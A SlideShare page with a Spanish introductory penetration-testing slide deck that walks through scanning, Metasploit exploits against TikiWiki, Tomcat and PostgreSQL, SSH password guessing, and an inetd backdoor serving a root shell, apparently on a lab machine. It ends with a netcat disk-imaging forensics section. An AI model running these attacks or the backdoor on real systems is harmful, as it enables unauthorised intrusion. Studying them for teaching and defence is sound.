SlideShare una empresa de Scribd logo
1 de 15
PENTEST
Una pequeña mirada al mundo del hackin
Por que quiero ser un super
hacker?
Seguridad Informatica
● No hay un sistema 100% seguro.
● A parte de que es una ilusión hoy veremos que
tan complicado puede ser tomar el control de
un servidor.
Primeras técnicas de penetración
● Under desk password and over screen
password
NMAP
● #descubriendo nodos en la red
● nmap –sP 192.168.1.0/24
● #descubriendo servicios en el server
● nmap –sV 192.168.1.X (versiones de
programas)
● -O
Mmm interesante tiene un servidor
web, que vive ahí???
● Descubrimiento de directorios en el servidor
web
● # cd /pentest/web/dirbuster/
● # java –jar DirBuster-0.12.jar
● escribimos el target, seleccionamos un archivo
de directorio y listo le ponemos start
Un servicio de portal, veamos que
podemos hacer...
●
# cd /pentest/exploits/framework3/
●
msf> search tikiwiki
●
msf> use auxiliary/admin/tikiwiki/tikidblib
●
msf auxiliary(tikidblib) > show options
●
● msf auxiliary(tikidblib) > set RHOST 192.168.1.X
● > exploit
● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec
● msf> show options
●
> set RHOST 192.168.229.129
● > show payloads
● > set PAYLOAD generic/shell_bind_tcp
Bien ahora es el turno de tomcat
● http://ip:8180
●
● msf> search tomcat
●
● msf> use auxiliary/scanner/http/tomcat_mrg_login
●
● set RHOSTS 192.168.229.129
●
● set RPORT 8180
●
Y eso para que me sirve tomcat 2
● #como ya podemos accesar al manager corremos otro
exploit
● msf > use exploits/multi/http/tomcat_mgr_deploy
● set USERNAME tomcat
● set PASSWORD tomcat
● set RPORT 8180
● set RHOST 192.168.229.129
● set PAYLOAD linux/x86/shell_bind_tcp
● exploit
Y postgres tendrá algo que decir??
● search postgres
● msf > use auxiliary/scanner/postgres/postgres_login
● set RHOSTS IP
● run
● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder
leer archivos del server.
● msf > use auxiliary/admin/postgres/postgres_readfile
● show options
● set RHOSTS ip
● set PASSWORD pass
● set archivo a leer
● run
Y el SSH apa
● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc.
● -h <HOST>: Dirección IP objetivo.
● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin.
● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh.
● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords
iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’.
● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns
● # veamos si nuestro usuario puede hacerse root
● sudo -i
Te veo a la vuelta, pero seguro
regreso
● #nos aseguramos que en el archivo /etc/services tengamos el
servicio mpm con el puerto 45
● mpm 45/tcp
● #ahora agregamos una linea a la configuracion de xinetd en el
archivo /etc/inetd.conf
● mpm stream tcp root /bin/bash bash -i
● # y reiniciamos el servicio de xinetd, probamos con telnet y con
nmap
Aun me queda tiempo, bien veamos
un poco de analisis forense
● Ejecutemos netcat en el server en el que
haremos la investigacion para poder recibir la
copia del server
● nc -l 9000 > driveimage.dd
● Obtenemos una copia del SO.
● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
Sleuth kit
● Con estas herramientas podremos ver que
había en nuestro Disco.
● fls -f ext -m / -r driveimage.dd > datos-salida
● ils -f ext -m driveimage.dd >> datos-salida}
● mactime -b datos-salida yyyy-mm-dd..yyyy-
mm-dd > informe-actividad.yyyy
● icat -s -f ext driveimage.dd inodo
Gracias
● @cgsomera
● somera@tuxteno.com

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
 
Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7
 
Configurar dns
Configurar dnsConfigurar dns
Configurar dns
 
Como crear un_tunel_entre_dos_pc recomendado
Como crear un_tunel_entre_dos_pc recomendadoComo crear un_tunel_entre_dos_pc recomendado
Como crear un_tunel_entre_dos_pc recomendado
 
Clase 1 introducción a symfony 2
Clase 1   introducción a symfony 2Clase 1   introducción a symfony 2
Clase 1 introducción a symfony 2
 
Manual de uso_de_squid
Manual de uso_de_squidManual de uso_de_squid
Manual de uso_de_squid
 
Administrar mi página web desde un cliente ftp
Administrar mi página web desde un cliente ftpAdministrar mi página web desde un cliente ftp
Administrar mi página web desde un cliente ftp
 
Squid
Squid Squid
Squid
 
0 entorno php
0 entorno php0 entorno php
0 entorno php
 
ssh en centos 7
ssh en centos 7ssh en centos 7
ssh en centos 7
 
Servidor ftp en centos 7
Servidor ftp en centos 7Servidor ftp en centos 7
Servidor ftp en centos 7
 
Criptografia
CriptografiaCriptografia
Criptografia
 
Entorno PHP
Entorno PHPEntorno PHP
Entorno PHP
 
Clientes ligeros y Servidores NX
Clientes ligeros y Servidores NXClientes ligeros y Servidores NX
Clientes ligeros y Servidores NX
 
TScrack: Brute Force Remote Desktop
TScrack: Brute Force Remote DesktopTScrack: Brute Force Remote Desktop
TScrack: Brute Force Remote Desktop
 
Anonimo el libro hacker
Anonimo   el libro hackerAnonimo   el libro hacker
Anonimo el libro hacker
 
Proxy Squid en Ubuntu
Proxy Squid en UbuntuProxy Squid en Ubuntu
Proxy Squid en Ubuntu
 
Practica nas andrei
Practica nas andreiPractica nas andrei
Practica nas andrei
 
Instalar git, github, node js, quasar
Instalar git, github, node js, quasarInstalar git, github, node js, quasar
Instalar git, github, node js, quasar
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
 

Destacado

deber base de datsos sql
deber base de datsos sqldeber base de datsos sql
deber base de datsos sqlGeovannyYungan
 
Singaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computadorSingaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computadorvane01si
 
Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)sheenk
 
Objectifs vendeur extrait
Objectifs vendeur extraitObjectifs vendeur extrait
Objectifs vendeur extraitPhilippe Babut
 
First B Summer 1912
First B Summer 1912First B Summer 1912
First B Summer 1912werni4slide
 
Herramientas para crear y compartir
Herramientas para crear y compartir Herramientas para crear y compartir
Herramientas para crear y compartir GeovannyYungan
 
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_frE82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_frCharles Santos
 
Ciclo del nitrógeno
Ciclo del nitrógeno Ciclo del nitrógeno
Ciclo del nitrógeno José Camacho
 
Presentación logistica
Presentación logisticaPresentación logistica
Presentación logisticaStamar Project
 
Ejercicio importante word
Ejercicio importante wordEjercicio importante word
Ejercicio importante wordrijuanchocha
 
Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2GeovannyYungan
 
Vanessa singaña excel
Vanessa singaña excelVanessa singaña excel
Vanessa singaña excelvane01si
 
Werning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)KulturWerning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)KulturStefan Werning
 

Destacado (20)

deber base de datsos sql
deber base de datsos sqldeber base de datsos sql
deber base de datsos sql
 
Singaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computadorSingaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computador
 
Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)
 
Objectifs vendeur extrait
Objectifs vendeur extraitObjectifs vendeur extrait
Objectifs vendeur extrait
 
Presentación lonjas
Presentación lonjasPresentación lonjas
Presentación lonjas
 
Zertifizierungen 1
Zertifizierungen 1Zertifizierungen 1
Zertifizierungen 1
 
First B Summer 1912
First B Summer 1912First B Summer 1912
First B Summer 1912
 
Herramientas para crear y compartir
Herramientas para crear y compartir Herramientas para crear y compartir
Herramientas para crear y compartir
 
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_frE82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
 
Ciclo del nitrógeno
Ciclo del nitrógeno Ciclo del nitrógeno
Ciclo del nitrógeno
 
Eleccions
EleccionsEleccions
Eleccions
 
Presentación logistica
Presentación logisticaPresentación logistica
Presentación logistica
 
Actividad4
Actividad4Actividad4
Actividad4
 
Ejercicio importante word
Ejercicio importante wordEjercicio importante word
Ejercicio importante word
 
Psicología
PsicologíaPsicología
Psicología
 
Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2
 
Vanessa singaña excel
Vanessa singaña excelVanessa singaña excel
Vanessa singaña excel
 
Ecosistema
EcosistemaEcosistema
Ecosistema
 
Werning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)KulturWerning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
 
Foros TeresaValdez
Foros TeresaValdezForos TeresaValdez
Foros TeresaValdez
 

Similar a Pentesting Basico

Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Advanced and comprehensive use of nmap
Advanced and comprehensive use of nmapAdvanced and comprehensive use of nmap
Advanced and comprehensive use of nmapztealt
 
Proyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de RedesProyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de RedesÁngel Sardinero López
 
Laboratorio "monitoreo con Pandora fms 2.0"
Laboratorio "monitoreo con Pandora  fms 2.0"Laboratorio "monitoreo con Pandora  fms 2.0"
Laboratorio "monitoreo con Pandora fms 2.0"sestebans
 
Clusters Beowulf
Clusters BeowulfClusters Beowulf
Clusters Beowulfsrcid
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapxavazquez
 
Servidores cent os final
Servidores cent os finalServidores cent os final
Servidores cent os finalSteven Restrepo
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)cl0p3z
 
Creacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware SoekrisCreacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware Soekrisozikox
 
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13peter69
 

Similar a Pentesting Basico (20)

Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
 
Snort 2006
Snort 2006Snort 2006
Snort 2006
 
Advanced and comprehensive use of nmap
Advanced and comprehensive use of nmapAdvanced and comprehensive use of nmap
Advanced and comprehensive use of nmap
 
Proyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de RedesProyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de Redes
 
Curso nmap
Curso nmapCurso nmap
Curso nmap
 
Curso nmap
Curso nmapCurso nmap
Curso nmap
 
Laboratorio "monitoreo con Pandora fms 2.0"
Laboratorio "monitoreo con Pandora  fms 2.0"Laboratorio "monitoreo con Pandora  fms 2.0"
Laboratorio "monitoreo con Pandora fms 2.0"
 
Clusters Beowulf
Clusters BeowulfClusters Beowulf
Clusters Beowulf
 
Samba ubuntu11_10_12 04_slide
Samba ubuntu11_10_12 04_slideSamba ubuntu11_10_12 04_slide
Samba ubuntu11_10_12 04_slide
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
 
Servidores cent os final
Servidores cent os finalServidores cent os final
Servidores cent os final
 
Clase6 (consola linux)
Clase6 (consola linux)Clase6 (consola linux)
Clase6 (consola linux)
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
 
Mrtg ubuntu
Mrtg ubuntuMrtg ubuntu
Mrtg ubuntu
 
Creacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware SoekrisCreacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware Soekris
 
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
 
Nagios
NagiosNagios
Nagios
 
Nmap
NmapNmap
Nmap
 

Último

Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónLourdes Feria
 
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIARAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIACarlos Campaña Montenegro
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores  NE24  Ccesa007.pdfNeurociencias para Educadores  NE24  Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdfDemetrio Ccesa Rayme
 
texto argumentativo, ejemplos y ejercicios prácticos
texto argumentativo, ejemplos y ejercicios prácticostexto argumentativo, ejemplos y ejercicios prácticos
texto argumentativo, ejemplos y ejercicios prácticosisabeltrejoros
 
2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdfBaker Publishing Company
 
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
cortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuacortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuaDANNYISAACCARVAJALGA
 
La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...JonathanCovena1
 
UNIDAD DPCC. 2DO. DE SECUNDARIA DEL 2024
UNIDAD DPCC. 2DO. DE  SECUNDARIA DEL 2024UNIDAD DPCC. 2DO. DE  SECUNDARIA DEL 2024
UNIDAD DPCC. 2DO. DE SECUNDARIA DEL 2024AndreRiva2
 
RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxAna Fernandez
 
MAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grandeMAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grandeMarjorie Burga
 
30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdfgimenanahuel
 
programa dia de las madres 10 de mayo para evento
programa dia de las madres 10 de mayo  para eventoprograma dia de las madres 10 de mayo  para evento
programa dia de las madres 10 de mayo para eventoDiegoMtsS
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxzulyvero07
 
Lecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadLecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadAlejandrino Halire Ccahuana
 
CALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDADCALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDADauxsoporte
 
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADODECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADOJosé Luis Palma
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.José Luis Palma
 
celula, tipos, teoria celular, energia y dinamica
celula, tipos, teoria celular, energia y dinamicacelula, tipos, teoria celular, energia y dinamica
celula, tipos, teoria celular, energia y dinamicaFlor Idalia Espinoza Ortega
 

Último (20)

Presentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza MultigradoPresentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza Multigrado
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcción
 
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIARAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores  NE24  Ccesa007.pdfNeurociencias para Educadores  NE24  Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdf
 
texto argumentativo, ejemplos y ejercicios prácticos
texto argumentativo, ejemplos y ejercicios prácticostexto argumentativo, ejemplos y ejercicios prácticos
texto argumentativo, ejemplos y ejercicios prácticos
 
2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf2024 - Expo Visibles - Visibilidad Lesbica.pdf
2024 - Expo Visibles - Visibilidad Lesbica.pdf
 
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
 
cortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuacortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahua
 
La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...
 
UNIDAD DPCC. 2DO. DE SECUNDARIA DEL 2024
UNIDAD DPCC. 2DO. DE  SECUNDARIA DEL 2024UNIDAD DPCC. 2DO. DE  SECUNDARIA DEL 2024
UNIDAD DPCC. 2DO. DE SECUNDARIA DEL 2024
 
RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docx
 
MAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grandeMAYO 1 PROYECTO día de la madre el amor más grande
MAYO 1 PROYECTO día de la madre el amor más grande
 
30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf
 
programa dia de las madres 10 de mayo para evento
programa dia de las madres 10 de mayo  para eventoprograma dia de las madres 10 de mayo  para evento
programa dia de las madres 10 de mayo para evento
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
 
Lecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadLecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdad
 
CALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDADCALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDAD
 
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADODECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.
 
celula, tipos, teoria celular, energia y dinamica
celula, tipos, teoria celular, energia y dinamicacelula, tipos, teoria celular, energia y dinamica
celula, tipos, teoria celular, energia y dinamica
 

Pentesting Basico

  • 1. PENTEST Una pequeña mirada al mundo del hackin
  • 2. Por que quiero ser un super hacker?
  • 3. Seguridad Informatica ● No hay un sistema 100% seguro. ● A parte de que es una ilusión hoy veremos que tan complicado puede ser tomar el control de un servidor.
  • 4. Primeras técnicas de penetración ● Under desk password and over screen password
  • 5. NMAP ● #descubriendo nodos en la red ● nmap –sP 192.168.1.0/24 ● #descubriendo servicios en el server ● nmap –sV 192.168.1.X (versiones de programas) ● -O
  • 6. Mmm interesante tiene un servidor web, que vive ahí??? ● Descubrimiento de directorios en el servidor web ● # cd /pentest/web/dirbuster/ ● # java –jar DirBuster-0.12.jar ● escribimos el target, seleccionamos un archivo de directorio y listo le ponemos start
  • 7. Un servicio de portal, veamos que podemos hacer... ● # cd /pentest/exploits/framework3/ ● msf> search tikiwiki ● msf> use auxiliary/admin/tikiwiki/tikidblib ● msf auxiliary(tikidblib) > show options ● ● msf auxiliary(tikidblib) > set RHOST 192.168.1.X ● > exploit ● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec ● msf> show options ● > set RHOST 192.168.229.129 ● > show payloads ● > set PAYLOAD generic/shell_bind_tcp
  • 8. Bien ahora es el turno de tomcat ● http://ip:8180 ● ● msf> search tomcat ● ● msf> use auxiliary/scanner/http/tomcat_mrg_login ● ● set RHOSTS 192.168.229.129 ● ● set RPORT 8180 ●
  • 9. Y eso para que me sirve tomcat 2 ● #como ya podemos accesar al manager corremos otro exploit ● msf > use exploits/multi/http/tomcat_mgr_deploy ● set USERNAME tomcat ● set PASSWORD tomcat ● set RPORT 8180 ● set RHOST 192.168.229.129 ● set PAYLOAD linux/x86/shell_bind_tcp ● exploit
  • 10. Y postgres tendrá algo que decir?? ● search postgres ● msf > use auxiliary/scanner/postgres/postgres_login ● set RHOSTS IP ● run ● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder leer archivos del server. ● msf > use auxiliary/admin/postgres/postgres_readfile ● show options ● set RHOSTS ip ● set PASSWORD pass ● set archivo a leer ● run
  • 11. Y el SSH apa ● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc. ● -h <HOST>: Dirección IP objetivo. ● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin. ● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh. ● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’. ● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns ● # veamos si nuestro usuario puede hacerse root ● sudo -i
  • 12. Te veo a la vuelta, pero seguro regreso ● #nos aseguramos que en el archivo /etc/services tengamos el servicio mpm con el puerto 45 ● mpm 45/tcp ● #ahora agregamos una linea a la configuracion de xinetd en el archivo /etc/inetd.conf ● mpm stream tcp root /bin/bash bash -i ● # y reiniciamos el servicio de xinetd, probamos con telnet y con nmap
  • 13. Aun me queda tiempo, bien veamos un poco de analisis forense ● Ejecutemos netcat en el server en el que haremos la investigacion para poder recibir la copia del server ● nc -l 9000 > driveimage.dd ● Obtenemos una copia del SO. ● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
  • 14. Sleuth kit ● Con estas herramientas podremos ver que había en nuestro Disco. ● fls -f ext -m / -r driveimage.dd > datos-salida ● ils -f ext -m driveimage.dd >> datos-salida} ● mactime -b datos-salida yyyy-mm-dd..yyyy- mm-dd > informe-actividad.yyyy ● icat -s -f ext driveimage.dd inodo